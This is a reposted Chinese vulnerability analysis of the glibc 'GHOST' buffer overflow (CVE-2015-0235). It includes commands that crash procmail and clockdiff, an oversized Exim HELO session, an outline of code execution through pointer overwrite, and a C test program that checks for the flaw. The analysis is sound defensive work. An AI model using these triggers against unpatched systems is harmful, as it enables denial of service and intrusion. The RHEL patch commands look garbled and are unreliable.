admin管理员组

文章数量:1122853

linux 幽灵漏洞,CVE

CVE-2015-0235:Linux Glibc幽灵漏洞分析 V1.0

2015-01-28 12:06:44

阅读:0次

漏洞描述:

glibc的__nss_hostname_digits_dots存在缓冲区溢出漏洞,导致使用gethostbyname系列函数的某些软件存在命令执行或者信息泄露的安全风险。

原因:

glibc\nss\digits_dots.c 的__nss_hostname_digits_dots函数未加验证的使用 strcpy (hostname, name),导致缓冲区溢出。

影响范围:

【本地】

某些环境下的procmail受影响

执行命令:/usr/bin/procmail "$_COMSAT_"12345670 "$_COMSAT_"123456701234 

错误信息:

procmail[4549]: segfault at c ip b768e5a4 sp bfcb53d8 error 4 in libc-2.13.so[b761c000+15c000]

某些环境下的clockdiff受影响

执行命令:/usr/sbin/clockdiff `python -c "print '0' * $((0x20000-16*1-2*4-1-4))"`

错误信息

clockdiff[3610]: segfault at b86711f4 ip b75de0c6 sp bfc191f0 error 6 in libc-2.17.so[b7567000+1b8000]

【远程】

特殊配置的Exim mail server受该漏洞影响

执行命令:user@...ian-7-7-64b:~$ python -c "print '0' * $((0x500-16*1-2*8-1-8))"

000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000user@...ian-7-7-64b:~$ telnet 127.0.0.1 25

Trying 127.0.0.1...

Connected to 127.0.0.1.

Escape character is '^]'.

220 debian-7-7-64b ESMTP Exim 4.80 ...

HELO 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

错误信息:

exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in libc-2.13.so[7fabef2a2000+182000]

利用:

1. 代码执行

在exim中覆盖next指针,实现在任意内存写任意内容。

2. 信息泄露

向exim发送畸形包,通过返回的错误信息,判断32位还是64位

测试:

更新版poc:#include 

#include 

#include 

#include 

#include 

#define CANARY "in_the_coal_mine"

struct {

char buffer[1024];

char canary[sizeof(CANARY)];

} temp = { "buffer", CANARY };

int main(void) {

struct hostent resbuf;

struct hostent *result;

int herrno;

int retval;

/*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/

size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;

char name[sizeof(temp.buffer)];

memset(name, '0', len);

name[len] = '\0';

puts("[befor]");

printf("%s\n",temp.buffer);

printf("%s\n",temp.canary);

retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

if (strcmp(temp.canary, CANARY) != 0) {

puts("[after]");

printf("%s\n",temp.buffer);

printf("%s\n",temp.canary);

exit(EXIT_SUCCESS);

}

if (retval == ERANGE) {

puts("not vulnerable");

exit(EXIT_SUCCESS);

}

}

补丁&解决方案

ubuntu:sudo apt-get update

sudo apt-get install libc6

RHEL:yum install update

yum install libc6

本文由 安全客 原创发布,如需转载请注明来源及本文地址。

本文地址:.html

本文标签: linux 幽灵漏洞CVE

版权声明:本文标题:linux 幽灵漏洞,CVE 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.betaflare.com/biancheng/1701699510a465280.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。